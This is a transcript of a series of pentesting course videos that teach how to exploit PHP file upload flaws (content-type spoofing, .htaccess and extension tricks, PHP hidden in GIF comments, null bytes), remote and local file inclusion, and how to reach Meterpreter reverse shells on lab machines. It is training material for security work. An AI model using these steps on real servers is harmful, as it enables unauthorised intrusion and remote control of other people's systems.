file_upload/basic. Let's click on file.html, browse for, let's say, an image file which would be our avatar. Click on upload. If you notice, it says file has been uploaded. It gives you some basic stats. And if we go to the uploads directory, we notice action_back.gif is available here. Fantastic. Now, how could an attacker abuse this functionality? So if I look at the source code for upload.php, what I notice is that apart from a basic check for an error, pretty much any file you upload gets saved with the exact same extension name. Everything remains the same, right? Now this is worrisome. And this is where the vulnerability exists, which a hacker can exploit, right? To give you some basic idea, basically by default, as soon as you upload a file, PHP is going to go ahead and save it in the temp directory using a temp name. And then when you call move uploaded file, you pretty much end up moving the temp file to whichever directory you want, right? If you notice, we are using the uploads directory. Okay. Now let's try and upload a backdoor using this vulnerability. It seems to exist. So I'm going to copy user share web shells PHP, and I'm going to use simple backdoor.php, copy it to the current directory, go back to the browser, refresh the page, and select simple backdoor.php, click on upload, and if you notice, it happily uploaded it because there are no checks of any kind. And if I go to the uploads directory, I can see my simple backdoor has been uploaded, which I can now click and then pretty much get access to the remote system by executing any possible shell commands. There you go, right? So this is the most simple case of executing a file upload vulnerability when there are no checks at all. Now, there could be more complicated cases in which there are checks for content type and extension name, etc., which we will look at in the next couple of videos. Now, what we've also done is that we've created a vulnerable ISO for file upload vulnerabilities, and this does not contain sample examples like the one included in this video. Rather, these are real-world applications for you to try. Now, this has also been posted to the Pentester Challenges section at Pentester Academy. And if you haven't looked at it already, I would highly recommend. You can download the ISO from the link provided here. The username, pass, etc. exists. So please try it out. That's all for this video. Thank you. And if you're enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thanks. Welcome to the Web Application Pentesting course at Pentester Academy. Now, in the previous video, we look at a very simple file upload vulnerability. In this one, we will look at beating content type checks in file uploads. So what is a content type check? Now, a lot of developers check for content types based on what is expected. So let's say only GIF images are expected to be uploaded, then a dev can check for image/GIF. Now, there are so many possible content types that a lot of developers mistakenly think that this is the best way to validate. Now keep in mind that the browser definitely checks and fills in the valid content type based on what it can detect in the file and initiates the upload. However, it is easy for an attacker to intercept this communication using a proxy and change the content type to what is expected. So let me give you an example. Now please download the source code in the zip file mentioned below the video in PA, Pentester Academy. And once you unzipped it under var ww, please go inside the directory file upload content type. There you go. Ensure you change the permission of the uploads directory to writable. Now, if we actually look at upload.php, what you would actually find is there is a check for content type, right? File type is checked, and if it's image.gif, then we basically go ahead and upload the file into a directory, right? It looks great. Now let's see how one can beat this. So let me first go ahead and upload an actual image file. And before Let's click on file.html. Let's browse, pick up a GIF file, click upload. Fantastic. The file uploaded as expected, and one would find it in here. Now let's actually go ahead and upload our backdoor, simple-backdoor.php. And if you do not recall, then this was copied from user share web shells php simple-backdoor.php to the current directory as in previous videos. Let's click on upload, and if you notice, it gives you an error saying please upload a GIF file. Fantastic. So here is what I'm going to do. I have my Burp Suite running. I'm going to go ahead and send all the traffic through my proxy. Ensure you have no proxy for localhost and 127.0.0.1 removed. This is important. Now let me actually go back to my older directory. Go to file.html. Now let me enable intercept on burp. And let's first look at what is sent when your GIF file is sent. Let's hit upload. Burp screams. Let's see what's in there. Now if you notice, it's a post request for the file upload, and as you can clearly see, the content type is actually mentioned to be image.gif, just as what would be expected, and then you have the binary data for the GIF. Fantastic. So let me go ahead, forward this, and let it be. Now when I go ahead and try to send in the backdoor, let's enable intercept again, hit on upload. What we end up noticing is the content type is application/x-php. This is what is causing the problem. And let's use burp to change the content type to image/gif. And let's forward this new request, remove intercepts. And if you notice, this time it accepts it because we bypassed the content type check, and simple-backdoor.php has been successfully uploaded. And the application goes ahead and erroneously detects the content type to be image.gif. Now let the games begin. Go to the uploads directory, and there you go, you have your simple-backdoor.php, and now we can go ahead and run arbitrary commands using our backdoor. And there you go, right? Fantastic. So as you're clearly seeing, having a simple content type check is really no form of security at all for a developer, simply because to change the content type is totally in the attacker's hand by using a simple intercept proxy. So hopefully this video was fun, and please do download the arbitrary file upload vulnerable ISO packaged with over 25 vulnerable applications from the real world. You should also find solutions to this uploaded to Pentester Academy. And if you enjoyed this video, then definitely recommend Pentester Academy to your friends and colleagues. Thank you. Welcome to the web application pen testing course at Pentester Academy. Now in this video, we will look at bypassing blacklists in file upload vulnerabilities. So a lot of times developers think that if they create a blacklist, let's say not to allow any PHP file to be uploaded, then they are safe. Now in this video, we will look at how to debunk that myth. So let's jump right in. Now please download the file
the zip file which is available below this video and unzip it inside the file upload directory, and this should unzip into a file called blacklist, inside which you will find these 3 files, rather 2 files in a directory. Now ensure that you go ahead and make the uploads directory writable. Super important. Now let's actually look at the source code. So here we go. Now in this PHP file, basically there is a not allowed list which contains of PHP as the extension, which cannot be allowed to upload, and if that is detected, then the program pretty much exits, right? So let's go ahead, try this out. Now to do this, let me also open a new tab and let me copy a web shell based backdoor, a very simple one in this case, from user share web shells php simple backdoor.php. Let's copy it to the current directory, and let me try uploading this first. Let's hit upload, and if you notice, nothing shows up. And if we actually look at the uploads directory, you would find that nothing is uploaded, just as expected. Fantastic. Now let's try and beat this in a simple way. Let me rename simple backdoor.php to, let's say, simple backdoor.capital.php, and let me go ahead and upload this. So let me go ahead, upload this. Aha, looks like we succeeded because we are not checking for case sensitivity. Fantastic. We can go in here, but now when we click on this, you would actually notice that pretty much nothing got executed, right? Now the problem really is that your Apache server does not seem to detect this extension capital PHP as something it should execute. Okay, so let's go back and try and solve this problem. Now in order to be able to succeed with this exploit, we just want one condition to be enabled on the web server, which is to actually allow HT access files in different directories, and that requires allow override to be turned on to all. So let's go ahead and do this for our web server, and please note it's very common for this configuration to actually be enabled because a lot of web servers use HT access. So here is where we have Apache 2, and then we go to sites available, the default one, and for var www we can actually go in and enable allow override to all. Let's also restart our Apache server. Fantastic. Now let me actually create a .ht access file locally, and in that I'm going to add a new type which will be application, and then you'd actually have x httpd php, and the allowed extension becomes capital PHP. Now let's go back in here, click on file upload, hit browse. Now by default we cannot see the hidden .file, so let's right click and say show hidden files. Here is my HT access, so open and let's upload. Fantastic. Now, of course, Apache will not allow you to see the htaccess in here. However, if you had access to the directory, you could actually at least look at the fact that it's been overwritten. File upload, blacklist, uploads directory, and if you actually do an -a, you'll actually find our .htaccess has been successfully uploaded. Now this would happen because very simply the uploads directory is writable, right? Now when you go ahead and click on simple backdoor.php, there you go. This time around it executes. So I'm going to copy this out, paste it in there, and there we go, right? Now even though I use the extension capital P, H and P, keep in mind that you could have any extension. So let me go ahead, give you an example. Let's actually move simple backdoor.php to simple backdoor.blah, right? And let me open up our htaccess file and actually change this to blah. Now what this directive does is for file extensions with blah, it pretty much goes ahead and invokes the PHP subsystem to handle it. Right, so this time around let me go ahead, upload the file back again. Try to upload both files. So let me go ahead and upload simple backdoor.blah first. And now let me upload our htaccess file, the new one. Fantastic. Now if I go back to the uploads directory, I'll actually find simple backdoor.blah, click on it, and if I try to execute a command, there you go, works perfectly, right? So this is how it is possible for you to subvert cases in which a blacklist is being used. Now keep in mind, even though I had actually given a very simple blacklist, you could have a large number of file extensions mentioned in there. And if you really notice, if htaccess is allowed, which pretty much is true for most web servers, it is pretty easy to break this defense. Now, we've also released an arbitrary file upload vulnerable ISO, which a bunch of vulnerabilities in there, available in this URL. So please download it and try the examples out in that as well. And if you're enjoying your time at Pentester Academy, then we would really request if you can recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the Web Application Pentesting course at Pentester Academy. Now in this video, we will take up the blacklist case as we did in the last one and look at how we can bypass this by using different extensions such as PHP 3, PHP 4 and PHP 5 rather than using the plain vanilla PHP as the extension. So the sample program pretty much is the same and you can use it from the last video. If you haven't, you can download the file from below this video. Now, if we have a blacklist just for PHP, what the developer is forgetting that PHP 3, PHP 4 and PHP 5 are absolutely valid extensions and funny enough supported by default. So let me give you an example. And in this, I'm going to open up PHP configuration on Apache. And I'm actually on a Kali Linux machine. So if I go into etc Apache and I go into mods available and then php5.conf, if you notice at the top here itself that the handler set for application x httpd php
consists of PHP 3, PHP 4 and PHP 5 as well, right? Now this opens up the vulnerability, and let's actually go in here. Now here is what I'm going to do. Let me actually go ahead and create a directory called demos, change directory demos, and copy my backdoor user share web shells php simple backdoor.php, copy it here, and then copy it out to PHP 3, PHP 4, PHP 5, right? So we have all 4 variations. And if I go ahead and basically go to the demos directory, select simple backdoor.php, as you would imagine, the upload pretty much fails. However, if I take up PHP 3, click on upload, the upload succeeds perfectly. And I can go into the uploads directory, click on this, and if you notice, even the execution has worked perfectly. Now this is one of the common things devs forget, is that PHP, PHP 3, PHP 4 and PHP 5, all of them work. So let me do the same for PHP 4, and there you go. If you notice, the upload succeeded, and similarly for PHP 5, the upload succeeded. And I can verify that by going inside the uploads directory. Fantastic. And I can go ahead and add this at the end just to ensure that we've confirmed that the execution is working. And there you go. Right? Fantastic. So this is how, if you have any form of filter which uses PHP as one of the blacklisted file formats, then you can still use PHP 3, PHP 4 and PHP 5, right? The best part is this does not require you to upload an htaccess file like we did in the last video. Now, along with this series, we've also released the arbitrary file upload vulnerable ISO. I'd highly recommend that you download it from this link and try out the different real-world software which has file upload vulnerabilities. That's all I have in mind for this video. If you're enjoying your time at Pentester Academy, then we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all. Welcome to the Web Application Pentesting course at Pentester Academy. Now in this video, we will look at how to bypass whitelists using double extensions technique in file uploads. So in the previous videos, we had looked at how a blacklist based approach basically fails. And as one can imagine, a whitelist based approach definitely provides a ton of more advantages. So as an example, if my allowed file extensions only includes a GIF, and I go ahead and check the type to image GIF, which of course we know can easily be spoofed, and also ensure that basically my extension is only GIF, then this can be very difficult to beat, because even if you end up renaming a PHP file to a GIF file, well, it's not going to help much, right? Simply because it just won't execute. Now let me take up an example. So let's say I copy user share web shells PHP simple backdoor.php into the current directory, and then I copy this out to simple backdoor. Let's say GIF, and if I go in here, and by the way, the source code is available below the video, so you can download and unzip this in the var www directory.
right? So if I go ahead, click on file.html, hit browse, and let's say select the GIF file, which is really a PHP file, and upload, well, it uploads happily. However, when I try to go ahead and execute it by typing in the URL, as you can well imagine, we pretty much will get nowhere, right? Fantastic. So this is where in Apache we can actually take advantage of something called double extensions. Now, quoting verbatim from the Apache manuals, care should be taken when a file with multiple extensions gets associated with both a MIME type and a handler. This will usually result in the request being handled by the module associated with the handler, right? And they actually give an example in which world.imap.html is actually going to be processed by the IMAP handler, which is imap-file. Now we can use this to our advantage, right? So let me show you how. I can rename simple backdoor.php to simple backdoor.php.gif, and now I can try and upload this. It uploads. I can go to the uploads directory and now click on this GIF. But if you still notice, nothing pretty much ends up happening, right? And the reason really is newer versions of Apache are actually hardened against this attack by default. Now let me give you an example. The secure configuration ensures that we pretty much cannot have double extensions, and the insecure configuration goes ahead and ensures that we can just do that. So let me actually go inside and modify the file accordingly. So I'm going to open up etc apache 2, and inside that let's go to mods available, and I'm going to go to php5.conf, right? And all I have to do is remove the $. This would make it the insecure configuration. Apache 2 control, restart, and if I go back in here and now to the uploads directory, simple backdoor.php.gif would now be passed to the PHP handler, and there you go, right? Now we can comfortably go ahead and execute the PHP file simply because Apache invokes the PHP handler for this file, right? And this is how we can exploit the double extensions case. So hope you enjoyed this video. We've also released an arbitrary file upload vulnerable ISO in which we've packed real world applications, and you can visit the link in the slide to go and download and try other examples with it. So that brings us to the end of this video, and if you have enjoyed your time at Pentester Academy, then we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you.
Hello all, welcome to the web application pen testing course at Pentester Academy. Now in this video, we continue with the different ways by which one can exploit file uploads in web applications. Now in this specific video, we will look at defeating checks which utilize the getImageSize function. So what is getImageSize? Well, as seen in previous videos, a lot of developers figured out that checking the MIME type etc. based on what the browser sends you is not a good idea. This was simply because the attacker can change all of these values. So what if one actually checked the file once it is uploaded and convinces oneself that this is actually a GIF file or an image file. Now this is where a lot of them go ahead and use get image size. Now get image size finds out the size of a given image and also sends back a ton of other attributes. Depending on what the developer wants to do, he can figure out the width, the height, the MIME type, and a couple of other interesting things. Now, why is this difficult to beat? Simply because even if you had double extensions allowed in PHP and on the web server, you would not be able to just rename a PHP file and beat this check. So let's go ahead and try this out. So you can go ahead and unzip the zip file provided below this video inside the var www file upload directory and create a directory called uploads, and then ensure that the uploads directory is writable. Okay. Now let me show you an example. Let's create a workbench. So let me say Nikto workbench, and let me go ahead and copy out the simple backdoor program, share web shells php simple backdoor to the current directory. Let me then go ahead and copy simple backdoor to simple backdoor.php.jpg, or let's actually keep it easy, GIF. And now let me ensure that Apache allows double extensions with PHP. This can be done by going ahead to mods available php5.conf and ensuring that the dollar is removed. This ensures PHP will process double extension files. Time to restart Apache. There you go. Now if I go in here, click on file upload, and even if I go ahead and enable intercepts in Burp, and upload the GIF file, and within Burp, let's say I go ahead and change the image type, which is already changed to that. So I think pretty much we are ready. So let's just forward this, right? And if you notice, it basically tells us please upload a GIF file. Now the reason for this is very simple. We have an actual check here for the size of the image using get image size, and if get image size fails, because of course in this case this is a PHP file, it returns a false, and then the program tells you to upload a GIF file. So how do we beat such a case? Well, keep in mind that almost all image formats tend to support attaching meta information inside of it, which include comments and a bunch of other things. Now this is where we are going to take an absolutely perfect GIF file and go ahead and add PHP code in the comment section of the GIF image. Now keep in mind that when the PHP interpreter starts reading the file, all it's going to scan for is the open PHP execute and the close PHP execute tags, right? If it finds that in the file, it will happily execute what is inside. So let me go ahead. Let's first find a PHP file. Let's find a GIF file which we can actually use. So let me actually use action underscore back.gif or pretty much any GIF file. I think this was copied before. So I'm going to go inside the Metasploit directory. Here is one of the GIF files. Honestly guys, any GIF file you can find on the system, okay? Doesn't really matter which one here. Now let me copy the GIF file to this directory. Oops. Now I want a utility which will allow me to add comments into this GIF file. To do that, install a utility which does not ship with backtrack by default called GIFSQL. Okay, I've already installed it. You can install it as well. Now we can actually use GIFSQL and add comments. Now inside the comments section, we can pretty much go ahead and add PHP statements, and you would see the difference. Actually, let me show you the difference before and after. So I'm running the strings command on action_back.gif. If you notice, just these three strings in here. Now let me actually use GIFSQL, and then here is my open PHP tag, here is my close PHP tag, and within here let me say echo hacked. Right now GIFSQL can take in file as input, and the output file would be stored whatever you mentioned. So let's call it action_back.php.gif. There we go. Right now if I actually do a strings action_back.php.gif, if you've noticed, our little string has been put inside the GIF file. Fantastic. Now let me actually go back and upload this file, which should pretty much happily upload. Oops, my mistake. The file is actually this one, action_back.php.gif, not the simple backdoor one. Okay, let me go back in here. Yep, I uploaded the wrong file. This is the one we need to upload. And there you go, right? The file seems to be uploaded. Let's actually go to the uploads directory. Here it is. So click on it. And if you notice, we get something in here. But if you notice, our string hacked is also in there, right? There you go. So which means PHP did execute this. Now let's actually go ahead and put in something useful inside the file. So let's actually put in simple-backdoor.php, this file. Now let's first strip all the new lines before we put it inside the comment section. So it should be very simple to do that. Actually go in here and I'll give you an example first how to strip the new lines. You should use the tr utility and tell it to replace all new lines, let's say with a space, and then give it simple-backdoor.php, and there you go, right? So now let me go back in here and basically execute this thing first and go ahead and use that for input. Okay,
So now let me go ahead and run this. And now if I do a strings on the file, you notice that the entire backdoor has been inserted in there. Fantastic. Now let me go ahead and upload this file. I'll remove the previous one, though you could just pretty much rename it as well. So here we go. Click on file.html. Let's go in. Here is the file again. Click on upload. It's been happily uploaded. Let's go to the uploads directory. Hit this. And if you notice, we get our friendly little prompt in there. Let's copy this out as the argument to pass in. And there you go, right? Now pretty much this is as good as a web shell in your control. Fantastic, right? So this is how one can go ahead and evade the get image size check. In this case, we both had the whitelist as well as get image size. The only thing required was double extensions were allowed to work with PHP, which was this configuration, the one here below. Right, so I've also added all of these little statements in the presentation just so that you can very quickly use them as a cheat sheet. And as mentioned in other file upload demos, please download the arbitrary file upload vulnerable ISO from the link provided here and try out the different real world applications with file upload vulnerabilities created by our team member Ashish. And if you enjoyed this video and are having fun at Pentester Academy, then we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you. Welcome to the Web Application Pentesting course at Pentester Academy. Now, in continuation with the file upload vulnerability series, now let's look at how null byte injections can be used. So can you spot the vulnerability in this PHP code, right? If you notice, we are actually getting in a user input parameter name from a post request over here. And after that, we are actually going ahead and using name to go ahead and upload a file and give it the name which the user has given. Of course, we are also checking to ensure that the user has given a name which has an extension GIF, right? And additionally, we are also using get image size to ensure and check that this is an actual GIF file, right? Fantastic. So let's go ahead and see how one can tackle this case. And this is where null byte injections in file names can come in handy. The best part is you do not require the double extension or multiple extension support in the config. So we can go back in here, open up the Apache PHP config, and ensure we put in our dollar in here. Let's restart Apache. And now that Apache is restarted, let's go ahead and try this vulnerability out, right? So in this case, I have the traffic going through Burp, so you can set up Burp accordingly. And I'm going to use my workbench. Let me ensure we start with a clean slate. I'm going to go ahead and copy a GIF file to the current directory. And if you remember, we had used this utility in the last video called GIFsicle. Let's go ahead and use that. And let's also copy backdoor.php from user share web shells php simple backdoor.php to the current directory, and then just use chifsicle -- comment and just like in the last video, let's remove all the new lines, though it's not mandatory. Honestly, you can go even without the new lines, but personally I like to see it all compressed up. And then action back goes in, right, dot php dot gif, or rather we can actually even do an out dot gif goes out. We can do a quick strings on out dot gif. Oops, my mistake. I should have force this to execute rather than just using it as a string. Right, there you go. So the backdoor is inside. Fantastic. Now in this case, let's say we give a file name demo.gif, right? Then we hit browse. Let's put this in. Let me ensure this is pretty much a clean directory. Right, and again unzip the source code files. This file is not required, and ensure that the uploads directory has write permission on it. Hopefully I don't have any other files, but just so that we begin with a clean slate. Right, now this directory is available for download below this video, so please download this under var www just to ensure that you are running the same environment which I am. Now when I hit upload, right, this would of course happily upload, and if I go to uploads, I would go ahead and find, right, the GIF file which gets executed. Now if I go back in and let's say do a demo.php.gif, upload this file, again happily gets uploaded. But if you note, we again just still get the GIF file. Now because the double extensions attack isn't working, pretty much PHP is not trying to interpret our GIF file, right? So here is where the null byte injection can come in handy, right? So let's do the following. Let's put in demo.php.gif. Honestly, you could just put in demo.gif and we'll modify it along the way. Let me go ahead and enable intercepting. Browse. Let's put our backdoor GIF in. Hit upload. Go back in here. Now, what I want is I want to go ahead and put in PHP, then a capital A. Let me just explain in a bit. Now what I'm going to do is the capital A I'm going to go ahead and replace in hex mode and make it a null, okay? So that when PHP actually, when it works with the file, because of the fact that it's going to use the C libraries underneath it, the null which will replace the A would end up terminating the string here itself, and then the file would actually get saved as demo.php, right? So let me go to the hex view. Let me go to this area here, demo A. Now A, if you remember, is 41 in hex. So I'm going to go ahead, make this a 00, and forward this. Right, this is actually Google safe browsing, other stuff which Firefox is throwing at us. Let's not worry. But now if you actually go into the uploads directory,
Fantastic. If you notice, demo.php has been happily saved. And this is our original backdoor, which we can now take, copy up in here, and execute. And there you go, right? Fantastic. So null byte injection is a very common technique, and as one can pretty much go ahead and see, it makes life very, very easy for such kind of attacks, right? So download the code and try out this attack, and this will allow you to go ahead and experience this existing vulnerability also on your own systems. Remember to download our file upload vulnerable ISO from the link provided. And if you're enjoying your time at Pentester Academy, then please do recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the Web Application Pen Testing course at Pentester Academy. Now in this video, we will look at how exploiting file uploads we can actually get a meterpreter on the box. So the process is actually quite straightforward. The first is to create a PHP meterpreter and then to upload it on the remote server using the file upload vulnerability. After that, we set up an exploit handler locally on the attacker machine and execute the PHP meterpreter to get access to the box. So let's jump right in. Now I'm going to be using the very first example, which is the basic example on file uploads for this demo, and I would recommend that you try out for all the other variations in file upload vulnerabilities which we have discussed in the last couple of videos. So let's jump right in. Now the first task is to create a PHP meterpreter. So this can be done using MSF Venom -p PHP meterpreter reverse TCP. The output format would be raw, and then we would go ahead and redirect this into, let's say, meterpreter.php. Now as it's a reverse TCP, the lhost parameter needs to be given as well, which would be our local IP address. Let's verify what that is. On the attacker machine, my IP is 192.168.2.21. So 192.168.2.21. So we have our PHP meterpreter. Let's open it up. Now if you notice, there is a guard bit, the hash in there. Let's remove that. Let's save the PHP file. And now let's go ahead and upload this on the remote server using the file upload vulnerability. So let me go in there, so click on uploads, and there is our meterpreter.php. Fantastic. Now before we execute it, let's go ahead and set up an appropriate handler on the attacker machine. Reverse TCP. Let me now set lhost to 192.168.2.21 and let's hit exploit, and now our reverse TCP handler is waiting for a connection.
So let's go ahead now, execute meterpreter.php remotely. And there we go. We have our meterpreter session on the box. Right? Fantastic. Right? So this is how we can go from a file upload vulnerability to meterpreter on the box. Right? Now at this point, one could figure out how privilege escalation can be done by learning more about the version of Linux, the kernel, and a bunch of other possibilities. Fantastic. So please try this out with other vulnerable scripts I have given out in the file upload series in the last couple of videos, and hopefully this will be a fun experience. And if you're enjoying your time at Pentester Academy, then we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you. Welcome to the Web Application Pentesting course at Pentester Academy. Now in this video, we will look at remote file inclusion vulnerability basics. So what is the remote file inclusion vulnerability? Now very simply put, if user editable input, and the reason I use this phrase is, let's say parameters in the URL, or maybe something in the post or any other area such as cookies which the user can edit, is somehow used to include other files in the execution flow of the current PHP script. And if that user editable input is not checked and sanitized, then in some cases it might lead to arbitrary files being included by a malicious user. Now, in PHP, the ways by which you can include remote files are using functions such as include, include once, require, and require once. Now, let me show you how a typical vulnerable file includes looks like. So we actually get an input from the user for file, and then we are including that file without sanitizing or checking this value in any way. Now keep in mind that for RFI to work, or rather for include, require, include once, require once to work, a specific PHP configuration needs to be turned on, and that is allow URL include, right? So on default installations this may be turned off, and later on we'll look at why LFI is probably a more probable case than RFI. But let's go ahead to the etc directory, and I'm using Kali Linux as my base. If you're using Ubuntu or any other Linux distribution, please figure out the appropriate directory. Apache 2, PHP ini, and then allow URL include. Here it is, and by default it's turned off. Let's turn it on, right? Or rather, okay, let's turn it on first and I'll show you how it looks like if we turn it off. Let me just restart Apache. Now let's actually go in here. So this is my RFI directory, and you should go ahead and unzip all of these files, and the zip file is available below the video into the var ww directory. This creates an RFI directory with the following files in them, and all we do is rfi.php can import home or contact. So let's say rfi.php and then file equals home.php, right? And if you run it, let's say without any parameters, this basically just says file included,
But now when we include home, it says home.php, and we can also include, let's say, contact, and this includes contact, right? Very common functionality on the web, right? You may have page equals instead of file equals, but RFI is, or rather using, such inputs is quite common. Now let's look at how to exploit this condition, right? Now require once, or include once. The best part is that you can go ahead and include files, of course, on the local machines, and not just that, but also on remote servers. So let me actually create a directory called RFI, and let me quickly look at my local IP address 192.168.2.22, and let me go inside the RFI directory and copy our simple backdoor in there. There we go. And now let's run our favorite little Python HTTP server, and let's have it listen on port 8000. Now instead of contact.php, can pretty much go in here and say HTTP 192.168.2.22, and port number is 8000, simple backdoor.php. And if you notice, simple backdoor.php executes, gives us the usage. So let's copy this out, paste it here, and let's replace the question mark with an ampersand as it's an additional parameter. And there you go, right? Now you can pretty much get a shell on the box. And if you notice, every single time the file is actually retrieved from the remote server, right? Unlike in the file upload case, where if you upload once you're done, in this case, every single time the file is fetched from the remote server. Now, of course, having RFI pretty much also means you can access most of the local files as well, whatever permissions you may have, right? And we'll come to LFI a little later, but RFI also allows you to do this, right? Fantastic. Now let's actually see what happens if we go ahead and turn off this config on PHP INI, right? So let's go back in here. It's basically allow URL include, and let's go ahead and turn it off. Let's restart Apache, and I'm also going to monitor the error logs in Apache. There we go. And now let me actually go ahead and try this out. If you notice, nothing happened, and if I go to the error log, you'll actually see, right, this gives you an error which basically tells you that this did not succeed, right? So RFI ends up failing. However, we can still go ahead and tamper and play with the local files, right? Simply because this does not require opening or fetching anything remotely, right? Awesome. So I hope RFI is clear to you and you understand why this config is super important. In the next video, we'll look at other variations of RFI. Now, if you're enjoying this video and others at Pentester Academy, then we would really appreciate if you can recommend us to friends and colleagues in your InfoSec community. Thank you. Welcome to the Web Application Pentesting course on Pentester Academy. Now in this video, we will look at exploiting RFI when there are forced extensions. Now, what do I mean by a forced extension? So here is a typical vulnerable file in which we actually go ahead and use a file parameter from the request, but rather than including the entire parameter, we go ahead and append, let's say, a .html. So this would end up ensuring that pretty much this entire file is an HTML file, right? This is what at least the developer intends to do. Now keep in mind, just like in the last video, for RFI to work, allow URL include needs to be turned on. So with this, let's have a look at this case. Now please download the zip file below the video, and this should give you a directory called RFI_limited, inside which you have these 3 files. So let's actually go ahead and demonstrate how they work. So I'm going to pass in a file input and I'm going to give home, and if you actually notice, now home.html from the same directory was taken, and home.html just echoes I am home, and contact.html just echoes I am contact, right? Now you can pretty much have any file extension with an include, and it just passes it on to the PHP engine, which will go ahead and run anything which is enclosed within the PHP delimiters. Fantastic. So now in this case, as one can clearly imagine, trying to go ahead and get a remote file. So let's do this. So I have a directory again called RFI, and I'm going to copy our favorite backdoor as a demo piece. User share, web shells, PHP, simple backdoor.php, and let's go ahead and run our Python based file server on port 8000. Let's go back in here and let's try this out. Let's put in, right, HTTP 192.168.2.22 8000 simple backdoor.php, right? Now we have a useful hint in here so that you can understand what is happening. And if you notice, the .html goes ahead and gets appended to whatever file name or URL we are mentioning here, and hence this is not found on the attacker machine, right? Now, of course, as one can clearly imagine, it is super simple to fix this, given that this web server is actually under the attacker's control. So here is a very simple way to fix this. I can actually make a copy of simple backdoor.php and append HTML at the very end. And let me rerun the server now. And let's hit an enter. And there you go. And if you notice, this time around, we have a 200 OK. The file was fetched and it was even executed, right? So here is what we would now do additionally. Just copy this out, and we would add this as an additional parameter, right? So let's go ahead, put this in, ampersand, and there you go. Right now we have been able to execute and cat the etc password directory, etc password file, right? Fantastic. So this is one way. Now for whatever said and done, let's say that the remote server from where you're getting the file isn't in full control of the attacker. Then the thing which we can try to do is try to invalidate this .html using different techniques. So let me actually give you an idea. Let me actually take the ampersand command, actually put it up front, just so that we can play with the URL a bit. Right now, if I put in a question mark and hit an enter, and let's actually monitor this thing in here, what you would notice is the remote URL being fetched is now question mark .html at the very end, which means this really tries to become more of a parameter rather than part of the base URL. And as one can imagine, this is happily fetched and executed, right? This is one of the ways. The other way is actually to make the .html an anchor, and this can actually be done by putting in %23, which is pretty much the hex for hash. And if you notice, we put a hash here at the very end, and let's keep changing the command just so we know it's actually working. There you go. And in this case, because a hash is interpreted locally by the browser as an anchor tag, the actual file being fetched pretty much is just simple-backdoor.php. Again, fantastic. Now, alternately, there are other things you can do. Let's say if you want to push this out as an additional parameter of some kind, then you could do a %26 and let's say var2 equals, and now if you notice, the URL actually becomes simple-backdoor.php. I probably had to add a question mark in there as well. Go back in here, this would not have been found, so I have to add a question mark, and there you go, right? This entire thing now becomes a way of passing an additional parameter, and of course the file is happily fetched with a 200 OK once again, right? And do a quick ls, and there you go, right? Fantastic. So as you can clearly see, in the case of an RFI, it is actually super easy to beat forced extensions. If you are in control of the attack server, then you can pretty much just rename the file to ensure that it matches whatever extension is forcefully appended on the server side. Alternately, you can try and make that extension part useless and put it more of either in the parameter or in the anchor section, right? Awesome. So that's all I had in mind for this video. And if you're enjoying your time here at Pentester Academy, then we would really appreciate if you can recommend us to friends and colleagues in the InfoSec community. Thank you. Welcome to the web application pen testing course on Pentester Academy. Now in this video, we will look at how to go from a remote file inclusion vulnerability to getting Meterpreter on the box. Now, why is getting Meterpreter so useful? Now, pretty much when you have RFI and you're trying to run your code with your uploaded PHP files, the problem always is how do you get a ton of functionality and even interactive functionality with your shell. And this is where Meterpreter actually provides you a ton of features, and at the very same time is decently standardized because it is part of Metasploit. So how do we get RFI to Meterpreter? Now, first of all, we are going to create a PHP Meterpreter version, and then we are going to execute this PHP Meterpreter using RFI. Now, of course, at this point we would require an exploit handler for the PHP Meterpreter running on the attacker's machine. So let's jump right to it. Now I am using the same RFI limited vulnerable application as in the previous video, and I have also put it below this video so that you can download it. So let's first create the PHP Meterpreter. So you're going to use msf venom -p PHP meterpreter reverse TCP. Then we would need to give the L host, which is the attacker's machine IP address. In this case is 2.22. The format would be raw, and the output we can store it in, let's say, meter.php. So let's wait for a second. Now let's open up meter.php, and meterpreter, the PHP version, has a guard hash bit in the beginning. Let's remove that, save the file. Now let's set up the web server in here with simple HTTP server. Let's run it at port 8000. Go back to our previous example, if you recall, and let's now go ahead and fetch meter.php. Now before you run this or hit an enter, remember that we've forgotten to set up the exploit handler. So let's do that first. Use exploit multi-handler. Set the payload to be PHP meterpreter reverse TCP. Set lhost to be 192.168.2.22, and let's wait for our shell to come in. Now let's hit an enter in here, and if we go back, there you have a meterpreter session. Fantastic. Awesome, right? So this is how we can get from LFI to meterpreter in 3 easy steps. So hopefully you enjoyed this video, and of course while setting this up, remember that for RFI to actually work, allow URL include needs to be enabled. That's all I had in mind for this video. If you're enjoying your time at Pentester Academy, we would really appreciate if you can recommend us to your friends and colleagues in the InfoSec community. Thank you. Hello all, welcome to the web application pen testing course on Pentester Academy. Now in this video, we will learn about local file inclusion basics. Now, why is LFI important? We've looked at a bunch of RFI examples, but keep in mind that RFI would only work if the allow URL include is actually set to on. Now in most default PHP installations, allow URL include by default is set to off, and hence RFI will not work in most of the cases, but LFI would. So here is what I've done. I've created basically a PHP script which is vulnerable to LFI and RFI, but of course RFI won't work simply because the Apache config does not allow URL include. So let's jump right in. Now the code is available as a zip file under this video. Please download it, and once you download and unzip it in the var www LFI directory, you would actually find the above files in there. So let me actually show you the functionality. So this takes in page as an input from the URL and goes ahead and displays the appropriate page. So let's try this out. Page equals home.html, and of course the home page runs, and page equals contact.html, and the contact page runs, right? Now if you followed the last couple of videos, contact.html and home.html are very simple PHP scripts. Now LFI isn't going to work. Let's prove that. So let's set up a web server. Sorry, RFI won't work. So let's go back in, try the URL. Right, but if we go there, you notice there was no request. Now if you actually monitor the logs, the error logs, and try this again, you'll basically see that it tells you that allow URL include is set to 0 or is disabled, and hence this can't work, right? And that's why now all we are left with LFI. So in LFI, you can actually go ahead and try and reference local files. So let's say etc password, and if you notice, it's gotten included. Now what you can read is pretty much dictated by the different permission sets which are there. Now in many distributions, the log files may be readable by Apache, at least Apache is logs, which is not the case on Kali right now. So let's say var log Apache, if I do a -l, you'll actually notice that pretty much none of them are readable. There's just one, but really the size is 0 by 